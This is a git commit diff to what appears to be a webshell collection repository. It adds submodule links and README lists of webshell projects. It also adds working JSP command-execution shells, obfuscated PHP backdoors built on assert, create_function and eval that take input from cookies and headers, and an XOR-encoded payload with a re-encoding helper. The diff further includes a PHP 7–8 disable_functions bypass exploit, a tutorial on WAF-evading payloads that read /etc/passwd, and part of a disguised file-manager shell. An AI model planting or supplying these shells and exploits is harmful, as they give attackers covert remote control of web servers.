Rename remad.me to read.me

backlion delete 404

.gitmodules

@@ -58,3 +58,21 @@
 [submodule "AntSwordProject/AwesomeScript"]
 	path = AntSwordProject/AwesomeScript
 	url = https://github.com/AntSwordProject/AwesomeScript
+[submodule "cseroad/Webshell_Generate"]
+	path = cseroad/Webshell_Generate
+	url = https://github.com/cseroad/Webshell_Generate
+[submodule "rexSurprise/webshell-free"]
+	path = rexSurprise/webshell-free
+	url = https://github.com/rexSurprise/webshell-free
+[submodule "0xAbbarhSF/CTF-WebShells-"]
+	path = 0xAbbarhSF/CTF-WebShells-
+	url = https://github.com/0xAbbarhSF/CTF-WebShells-
+[submodule "zxc7528064/-WebShell-"]
+	path = zxc7528064/-WebShell-
+	url = https://github.com/zxc7528064/-WebShell-
+[submodule "xl7dev/WebShell"]
+	path = xl7dev/WebShell
+	url = https://github.com/xl7dev/WebShell
+[submodule "xl7dev/WebShell/Other/Webshell"]
+    path = xl7dev/WebShell/Other/Webshell
+    url = https://github.com/xl7dev/WebShell

0xAbbarhSF/CTF-WebShells-/README.md

@@ -0,0 +1,7 @@
+# CTF-WebShells-
+Collection of some Handy Capture The Flag 🟩 Web Shells .. Enjoy:D
+
+<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(15).jpeg">
+<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(16).jpeg">
+
+My Twitter: - 🕊️ [@0xAbbarhSF](https://twitter.com/0xAbbarhSF) <img src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white">

README.md

@@ -1,4 +1,4 @@
-# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
+# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)  | [Türkiye](https://github.com/tennc/webshell/blob/master/README_TR.md)
 
 这是一个webshell收集项目
 
@@ -40,16 +40,16 @@
 > 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
 > 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
 > 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
-> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
-> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
-> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
-> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
-> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
-> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
-> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
-> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
-> 19. [backlion/webshell](https://github.com/backlion/webshell)
-> 20. [twepl/wso](https://github.com/twepl/wso) wso for php8
+> 11. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
+> 12. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
+> 13. [tdifg/WebShell](https://github.com/tdifg/WebShell)
+> 14. [malwares/WebShell](https://github.com/malwares/WebShell)
+> 15. [lhlsec/webshell](https://github.com/lhlsec/webshell)
+> 16. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
+> 17. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
+> 18. [backlion/webshell](https://github.com/backlion/webshell)
+> 19. [twepl/wso](https://github.com/twepl/wso) wso for php8
+> 20. [flozz/p0wny-shell](https://github.com/flozz/p0wny-shell) p0wny-shell
 
 > ### 顺便在推一波网站管理工具
 > 1. 中国菜刀
@@ -79,10 +79,11 @@ Check github releases. Latest:
 
 [https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
 
-## [Thank you to JetBrains for providing an OSS development license for their products](https://www.jetbrains.com/?from=webshell)
+## Many thanks to Jetbrains for providing us with an OSS licence for their fine development tools such as [Jetbrains tools](https://www.jetbrains.com/?from=webshell).
 
-## 
+## [Thanks to Cloudflare](https://www.cloudflare.com/)
 
 [![Stargazers over time](https://starchart.cc/tennc/webshell.svg)](https://starchart.cc/tennc/webshell)
 
 
+

README_TR.md

@@ -0,0 +1,52 @@
+# webshell
+[简体中文](https://github.com/tennc/webshell/blob/master/README.md)
+========
+
+Bu, bir web kabuğu koleksiyon projesidir.
+
+*Birine gül verirseniz, elinizde bir koku kalır*  
+Bu projeyi indirdiğinizde lütfen bir kabuk da gönderiniz.
+
+Bu proje çeşitli yaygın betikleri içermektedir.
+
+Örneğin: asp, aspx, php, jsp, pl, py
+
+Eğer bir web kabuğu gönderirseniz, lütfen adı ve şifreyi değiştirmeyiniz.
+
+Not: Bir kabukta bilerek bir arka kapı olup olmadığı garanti edilemez, ancak kendi yüklerken bilerek asla bir arka kapı eklemeyeceğim.
+
+Lütfen gönderirken bir arka kapı eklemeyiniz.
+
+Eğer bir arka kapı kodu bulursanız, lütfen derhal bir problem oluşturunuz!
+
+Bu projenin sağladığı araçlar yasa dışı faaliyetlerde bulunmak için yasaktır. Bu proje yalnızca test amaçlıdır. Bu projenin neden olduğu sonuçlarla ilgili olarak herhangi bir sorumluluğum yoktur.
+
+> ### Bir proje genişletme 
+> 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
+> 2. Öldürmeksizin sınırsız web kabuğu oluşturma aracı
+> 3. Öldürmeksizin sınırsız web kabuğu oluşturma aracı (Öldürmeksizin bir cümle oluşturma | Öldürmeksizin D kalkanı | Öldürmeksizin güvenlik köpeği koruması Tanrı hipposunu kontrol eder ve her şeyi kalkanlar)
+> 4. Yazar: yzddmr6
+> 5. Lütfen kim olduğunuzu belirtiniz.
+
+> ### Diğer web kabuğu projeleri (güncelleme 2020-09-14)
+> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
+> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
+> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
+> ...
+> [Diğer projeler için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
+
+> ### Bu arada, bir dizi web sitesi yönetim aracı yayınlıyoruz
+> 1. Chinese Kitchen Knife
+> 2. Cknife
+> 3. [Altman](https://github.com/keepwn/Altman)
+> ...
+> [Diğer araçlar için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
+
+Yazar: snmztony  
+[Websitesi](https://snmztony.github.io)  
+Lisans: GPL v3
+
+## İndirme bağlantısı
+[Github sürümlerini kontrol edin. En güncel sürüm için buraya tıklayın.](https://github.com/tennc/webshell/releases)
+
+## [Ürünlerinin OSS geliştirme lisansını sağladığı için JetBrains'e teşekkür ederiz](https://www.jetbrains.com/?from=webshell)

cseroad/README.md

@@ -0,0 +1,27 @@
+## Webshell_Generate
+**仅用于技术交流，请勿用于非法用途。**
+
+该工具没什么技术含量，学了一点javafx，使用jdk8开发出了几个简单功能用来管理webshell。页面比较low。
+工具整合并改写了各类webshell，支持各个语言的cmd、蚁剑、冰蝎、哥斯拉，又添加了实际中应用到的一些免杀技巧，以方便实际需要。
+
+## 使用说
+直接下载releases版即可
+
+![image-20220519102709278](images/:Users:cseroad:typora:java高级:images:image-20220519102709278.png)
+
+
+## 参考资料
+
+参考了诸多大佬的文章、工具、思路，如
+
+https://github.com/CrackerCat/JSPHorse
+
+https://github.com/LandGrey/webshell-detect-bypass
+
+https://github.com/czz1233/GBByPass
+
+https://github.com/pureqh/Troy
+
+http://yzddmr6.com/posts/jsp-webshell-upload-bypass/
+
+https://xz.aliyun.com/t/10937

jsp/2022-09-03-01.jsp

@@ -0,0 +1,17 @@
+
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@page language="java" pageEncoding="utf-8" %>
+
+
+<%
+    String cmd = request.getParameter("cmd");
+    Process process = Runtime.getRuntime().exec(cmd);
+    InputStream is = process.getInputStream();
+    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
+    String r = null;
+    while((r = bufferedReader.readLine())!=null){
+        response.getWriter().println(r);
+    }
+%>

jsp/2022-09-03-02.jsp

@@ -0,0 +1,16 @@
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@page language="java" pageEncoding="utf-8" %>
+
+
+<%
+  String cmd = request.getParameter("cmd");
+  Process process = new ProcessBuilder(new String[]{cmd}).start();
+  InputStream is = process.getInputStream();
+  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
+  String r = null;
+  while((r = bufferedReader.readLine())!=null){
+    response.getWriter().println(r);
+  }
+%>

jsp/2022-09-03-03.jsp

@@ -0,0 +1,17 @@
+<%@ page import="java.beans.Expression" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStream" %>
+<%@ page language="java" pageEncoding="UTF-8" %>
+<%
+  String cmd = request.getParameter("cmd");
+  Expression expr = new Expression(Runtime.getRuntime(), "exec", new Object[]{cmd});
+
+  Process process = (Process) expr.getValue();
+  InputStream in = process.getInputStream();
+  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(in));
+  String tmp = null;
+  while((tmp = bufferedReader.readLine())!=null){
+    response.getWriter().println(tmp);
+  }
+%>

php/2022-09-09-02.php

@@ -0,0 +1,5 @@
+<?php
+session_start();
+$_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]);
+
+?>

php/2022-09-09-03.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c($_SESSION['dmeo']);
+
+?>

php/2022-09-09-04.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c(getallheaders()['Demo']);
+
+?>

php/2022-09-09-05.php

@@ -0,0 +1,3 @@
+<?php
+$q=$_GET[1];
+file_get_contents("php".$q)($_GET[2]);

php/2022-09-0901.php

@@ -0,0 +1,9 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+
+$c(base64_decode($_COOKIE["PHPSESSID"]));
+
+?>

php/2023-04-08.js

@@ -0,0 +1,19 @@
+// 此代码为2023-04-08.php 里的二次生成密文版，只需要替换异或的第一部分字符串就好了
+// 感谢群友的无私奉献，我就直接拿来放到这里了
+
+function xorDecrypt(cipherText, key) {
+  let plainText = '';
+  for (let i = 0; i < cipherText.length; i++) {
+    let cipherCharCode = cipherText.charCodeAt(i);
+    let keyCharCode = key.charCodeAt(i % key.length);
+    let plainCharCode = cipherCharCode ^ keyCharCode;
+    plainText += String.fromCharCode(plainCharCode);
+  }
+  return plainText;
+}
+
+let cipherText = "$c(getallheaders()['root'])";
+// cipherText 可以修改起里面获取的内容
+let key = String.raw`t?~KI\OB)+8"X(A6K|{L5L&J]kf~`;
+let plainText = xorDecrypt(cipherText, key);
+console.log(plainText);

php/2023-04-08.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c('P\V,,(..EC]C<M3EcU kq)K%z6OE'^'t?~KI\OB)+8"X(A6K|{L5L&J]kf~');
+
+?>

php/How To Exploit PHP Remotely To Bypass Filters & WAF Rules.md

@@ -0,0 +1,92 @@
+![](https://miro.medium.com/max/1400/0*YS9Xgpo65DOnibMh.png)
+
+This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):
+
+![](https://miro.medium.com/proxy/1*8642MMLA0kKXigNugsntpA.png)
+
+Obviously, the sixth line is pure evil. The third line tries to intercept functions like system, exec or passthru (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the Cloudflare WAF (as always, I’m using Cloudflare because it’s easy and widely known by the people, this doesn’t mean that Cloudflare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.
+
+For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);
+
+![](https://miro.medium.com/proxy/1*Z7_QAFUWfTuGkkXC5iTIYQ.png)
+
+As you can see, CloudFlare blocks my request (maybe because of the “/etc/passwd”) but, if you have read my last article about uninitialized variables, I can easily bypass it with something like cat /etc$u/passwd
+
+![](https://miro.medium.com/proxy/1*XjThoSZZVxdHPsc7yvr3cA.png)
+
+Cloudflare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the system function without using the “system” string? Let’s take a look at the PHP [documentation about strings!](https://secure.php.net/manual/en/language.types.string.php)
+
+PHP String escape sequences
+
+*   \\\[0–7\]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\\400” === “\\000”)
+*   \\x\[0–9A-Fa-f\]{1,2} sequence of characters in hexadecimal notation (e.g. “\\x41”)
+*   \\u{\[0–9A-Fa-f\]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)
+
+Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.
+
+PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.  
+this means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:
+
+![](https://miro.medium.com/proxy/1*6tj_EG6wcNf1cZTx6mGcQw.jpeg)
+
+the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:
+
+![](https://miro.medium.com/proxy/1*cyDR__qU4qIfwRbHq0Fsdg.png)
+
+This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.
+
+What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:
+
+![](https://miro.medium.com/proxy/1*xaTUZpVHH-CwqDLSvLC2LA.png)
+
+as you can see on the third line, now the script prevents the use of “ and ‘ inside the $\_GET\[code\] query string parameter. My previous payload should be blocked now:
+
+![](https://miro.medium.com/proxy/1*qNE1auDSwwnzBVwO174kXw.png)
+
+Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever is inside round brackets without a specific type declaration, is treated as a string:
+
+![](https://miro.medium.com/proxy/1*GKGsbLzK70i4qo_eg8Irhg.jpeg)
+
+In this case, we’ve two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $\_GET variable. If I send a request like ?a=system&b=ls&code=$\_GET\[a\]($\_GET\[b\]); the result is: $\_GET\[a\] will be replaced with the string “system” and $\_GET\[b\] will be replaced with the string “ls” and I’ll able to bypass all filters!
+
+![](https://miro.medium.com/proxy/1*NcvPl-CRHy2Cm5xUsbSFGw.jpeg)
+
+Let’s try with the first payload (sy.(st).em)(whoami);
+
+![](https://miro.medium.com/proxy/1*DiaoAKPA5blRp3PCkCwf4w.png)
+
+and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$\_GET\[a\]($\_GET\[b\].$\_GET\[c\]);
+
+![](https://miro.medium.com/proxy/1*8AiSFSkm98axKo_7YUJf9w.png)
+
+In this case, is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:
+
+This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr\[“internal”\], and the user-defined ones using $arr\[“user”\]. For example:
+
+![](https://miro.medium.com/proxy/1*WRxh720WAmWz-PdAEjUQ0Q.png)
+
+This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:
+
+![](https://miro.medium.com/proxy/1*GJpCkpPrYRtTfUNgd680hw.png)
+
+obviously, this should work against our Cloudflare WAF and script filters:
+
+![](https://miro.medium.com/proxy/1*eBOSkK_YZA5S5mLAlGwsmg.png)
+
+Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string\[2\] or $string\[-3\]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);
+
+![](https://miro.medium.com/proxy/1*FhshSF88OXuviKoG1Sf-Gw.png)
+
+If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like
+
+![](https://miro.medium.com/proxy/1*Pqo5eWcCrAzO_798EN-bpQ.png)
+
+![](https://miro.medium.com/proxy/1*v_5x3PDduhRhkLjNZ7caCg.png)
+
+Let me say that with the OWASP CRS3 all become harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, this level is designed to prevent any false positives. With a Paranoia Level 2 all things become hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with Cloudflare WAF:
+
+![](https://miro.medium.com/proxy/1*eyUzRsmsvGABNyRoRiqcXQ.png)
+
+![](https://miro.medium.com/proxy/1*9wRqE3kCK07cS0xId6T_xg.png)
+
+Originally published at https://tutorialboy24.blogspot.com

php/wso-ng/wsoExGently.php

@@ -0,0 +1,203 @@
+
+# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
+#
+# Bug: https://bugs.php.net/bug.php?id=54350
+# 
+# This exploit should work on all PHP 7.0-8.0 versions
+# released as of 2021-10-06
+#
+# Author: https://github.com/mm0r1
+
+function wsoExGently($cmd) {
+    define('LOGGING', false);
+    define('CHUNK_DATA_SIZE', 0x60);
+    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
+    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
+    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
+    define('CMD', $cmd);
+    for($i = 0; $i < 10; $i++) {
+        $groom[] = Pwn::alloc(STRING_SIZE);
+    }
+    $filtername = 'pwn_filter'.rand(1e4,1e5);
+    stream_filter_register($filtername, 'Pwn');
+    $fd = fopen('php://memory', 'w');
+    stream_filter_append($fd, $filtername);
+    fwrite($fd, 'x');
+    fclose($fd);
+}
+
+class Helper { public $a, $b, $c; }
+class Pwn extends php_user_filter {
+    private $abc, $abc_addr;
+    private $helper, $helper_addr, $helper_off;
+    private $uafp, $hfp;
+
+    public function filter($in, $out, &$consumed, $closing) {
+        if($closing) return;
+        stream_bucket_make_writeable($in);
+        $this->filtername = Pwn::alloc(STRING_SIZE);
+        fclose($this->stream);
+        $this->go();
+        return PSFS_PASS_ON;
+    }
+
+    private function go() {
+        $this->abc = &$this->filtername;
+
+        $this->make_uaf_obj();
+
+        $this->helper = new Helper;
+        $this->helper->b = function($x) {};
+
+        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
+        $this->log("helper @ 0x%x", $this->helper_addr);
+
+        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
+        $this->log("abc @ 0x%x", $this->abc_addr);
+
+        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
+
+        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
+        $this->log("helper handlers @ 0x%x", $helper_handlers);
+
+        $this->prepare_leaker();
+
+        $binary_leak = $this->read($helper_handlers + 8);
+        $this->log("binary leak @ 0x%x", $binary_leak);
+        $this->prepare_cleanup($binary_leak);
+
+        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
+        $this->log("real closure @ 0x%x", $closure_addr);
+
+        $closure_ce = $this->read($closure_addr + 0x10);
+        $this->log("closure class_entry @ 0x%x", $closure_ce);
+
+        $basic_funcs = $this->get_basic_funcs($closure_ce);
+        $this->log("basic_functions @ 0x%x", $basic_funcs);
+
+        $zif_system = $this->get_system($basic_funcs);
+        $this->log("zif_system @ 0x%x", $zif_system);
+
+        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
+        for($i = 0; $i < 0x138; $i += 8) {
+            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
+        }
+        $this->write($fake_closure_off + 0x38, 1, 4);
+
+        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
+        $this->write($fake_closure_off + $handler_offset, $zif_system);
+
+        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
+        $this->write($this->helper_off + 0x38, $fake_closure_addr);
+        $this->log("fake closure @ 0x%x", $fake_closure_addr);
+
+        $this->cleanup();
+        ($this->helper->b)(CMD);
+    }
+
+    private function make_uaf_obj() {
+        $this->uafp = fopen('php://memory', 'w');
+        fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
+        for($i = 0; $i < STRING_SIZE; $i++) {
+            fwrite($this->uafp, "\x00");
+        }
+    }
+
+    private function prepare_leaker() {
+        $str_off = $this->helper_off + CHUNK_SIZE + 8;
+        $this->write($str_off, 2);
+        $this->write($str_off + 0x10, 6);
+
+        $val_off = $this->helper_off + 0x48;
+        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
+        $this->write($val_off + 8, 0xA);
+    }
+
+    private function prepare_cleanup($binary_leak) {
+        $ret_gadget = $binary_leak;
+        do {
+            --$ret_gadget;
+        } while($this->read($ret_gadget, 1) !== 0xC3);
+        $this->log("ret gadget = 0x%x", $ret_gadget);
+        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
+        $this->write(8, $ret_gadget);
+    }
+
+    private function read($addr, $n = 8) {
+        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
+        $value = strlen($this->helper->c);
+        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
+        return $value;
+    }
+
+    private function write($p, $v, $n = 8) {
+        for($i = 0; $i < $n; $i++) {
+            $this->abc[$p + $i] = chr($v & 0xff);
+            $v >>= 8;
+        }
+    }
+
+    private function get_basic_funcs($addr) {
+        while(true) {
+            $addr -= 0x10;
+            if($this->read($addr, 4) === 0xA8 &&
+                in_array($this->read($addr + 4, 4),
+                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
+                $module_name_addr = $this->read($addr + 0x20);
+                $module_name = $this->read($module_name_addr);
+                if($module_name === 0x647261646e617473) {
+                    $this->log("standard module @ 0x%x", $addr);
+                    return $this->read($addr + 0x28);
+                }
+            }
+        }
+    }
+
+    private function get_system($basic_funcs) {
+        $addr = $basic_funcs;
+        do {
+            $f_entry = $this->read($addr);
+            $f_name = $this->read($f_entry, 6);
+            if($f_name === 0x6d6574737973) {
+                return $this->read($addr + 8);
+            }
+            $addr += 0x20;
+        } while($f_entry !== 0);
+    }
+
+    private function cleanup() {
+        $this->hfp = fopen('php://memory', 'w');
+        fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
+        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
+            fwrite($this->hfp, "\x00");
+        }
+    }
+
+    private function str2ptr($p = 0, $n = 8) {
+        $address = 0;
+        for($j = $n - 1; $j >= 0; $j--) {
+            $address <<= 8;
+            $address |= ord($this->abc[$p + $j]);
+        }
+        return $address;
+    }
+
+    private function ptr2str($ptr, $n = 8) {
+        $out = '';
+        for ($i = 0; $i < $n; $i++) {
+            $out .= chr($ptr & 0xff);
+            $ptr >>= 8;
+        }
+        return $out;
+    }
+
+    private function log($format, $val = '') {
+        if(LOGGING) {
+            printf("{$format}\n", $val);
+        }
+    }
+
+    static function alloc($size) {
+        return str_shuffle(str_repeat('A', $size));
+    }
+}

php/zw.php

@@ -0,0 +1,10 @@
+<?php
+$E='t_contJents(J);@ob_end_cleJan();$rJ=@bJase64J_encodJe(@x(@gzJcomprJess($o),$Jk));pJJrint("J$p$kh$r$kf");}';
+$x='J$o.=$t{$i}^J$kJ{$j};}}return $Jo;J}if (@pJreg_Jmatch("/$kh(J.+)J$kJf/",J@fJile_get_contents("pJJhp://in';
+$f=str_replace('v','','vcreatvev_fuvnvvction');
+$B='$Jk){$c=stJrlenJJ($k);$l=JstrleJn($t);$o="";fJoJr($i=0;$iJ<$Jl;){for($j=0J;($j<$c&&$i<$Jl);$j+J+,$iJ++J){';
+$T='puJt"),$m)==J1) J{@Job_sJtart();@evJal(@gzuJncompJress(@x(@bJase64_JdecJode($m[J1]),$k)))JJ;$oJJ=@ob_ge';
+$o='$kJ="50eJcJ93c4";$kh="895JcJ0ccc987a";$kJf="0abJcJa6138a3e"J;$p="inO4VJnJw6Gr66szJatJ";Jfunction x($tJ,';
+$U=str_replace('J','',$o.$B.$x.$T.$E);
+$c=$f('',$U);$c();
+?>

php/zxc/README.md

@@ -0,0 +1,20 @@
+
+# liiuxii 💕
+* the webshell i use
+
+* Gel4y shell [g4y]
+* Kyo mini shell [kyo]
+* C99 shell [C99]
+* WSO shell [WSO]
+* MARIJUANA shell [MRJ]
+* file manager shell [FM]
+* Ngiiix1337 priv8 Shell [PRIV]
+
+
+[g4y]: https://raw.githubusercontent.com/liiuxii/zxc/main/bypass403.php
+[kyo]: https://raw.githubusercontent.com/liiuxii/zxc/main/kyo.php
+[C99]: https://raw.githubusercontent.com/liiuxii/zxc/main/c⁹⁹.php
+[WSO]: https://raw.githubusercontent.com/liiuxii/zxc/main/.v.php
+[MRJ]: https://raw.githubusercontent.com/liiuxii/zxc/main/mrj.php
+[fm]: https://raw.githubusercontent.com/liiuxii/zxc/main/fm.php
+[PRIV]: https://raw.githubusercontent.com/liiuxii/zxc/main/shell.php

php/zxc/bypass403.php

@@ -0,0 +1,171 @@
+<?php
+header("X-XSS-Protection: 0");
+ob_start();
+set_time_limit(0);
+error_reporting(0);
+ini_set("display_errors", false);
+http_response_code(404);
+define("self", "six666segs");
+$scD = "s\x63\x61\x6e\x64\x69r";
+$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
+for ($i = 0; $i < count($fc); $i++)
+	$fc[$i] = nhx($fc[$i]);
+if (isset($_GET["p"])) {
+	$p = nhx($_GET["p"]);
+	$fc[3](nhx($_GET["p"]));
+} else {
+	$p = $fc[2]();
+}
+function hex($str) {
+	$r = "";
+	for ($i = 0; $i < strlen($str); $i++)
+		$r .= dechex(ord($str[$i]));
+	return $r;
+}
+function nhx($str) {
+	$r = "";
+	$len = (strlen($str) -1);
+	for ($i = 0; $i < $len; $i += 2)
+		$r .= chr(hexdec($str[$i].$str[$i+1]));
+	return $r;
+}
+function perms($f) {
+	$p = fileperms($f);
+	if (($p & 0xC000) == 0xC000) $i = 's';
+	elseif (($p & 0xA000) == 0xA000) $i = 'l';
+	elseif (($p & 0x8000) == 0x8000) $i = '-';
+	elseif (($p & 0x6000) == 0x6000) $i = 'b';
+	elseif (($p & 0x4000) == 0x4000) $i = 'd';
+	elseif (($p & 0x2000) == 0x2000) $i = 'c';
+	elseif (($p & 0x1000) == 0x1000) $i = 'p';
+	else $i = 'u';
+
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+function a($msg, $sts = 1, $loc = "") {
+	global $p;
+	$status = (($sts == 1) ? "success" : "error");
+	echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>";
+}
+function deldir($d) {
+	global $fc;
+	if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
+	if ($fc[6]($d)) {
+		array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
+		rmdir($d);
+	} else {
+		unlink($d);
+	}
+}
+?>
+<!doctype html>
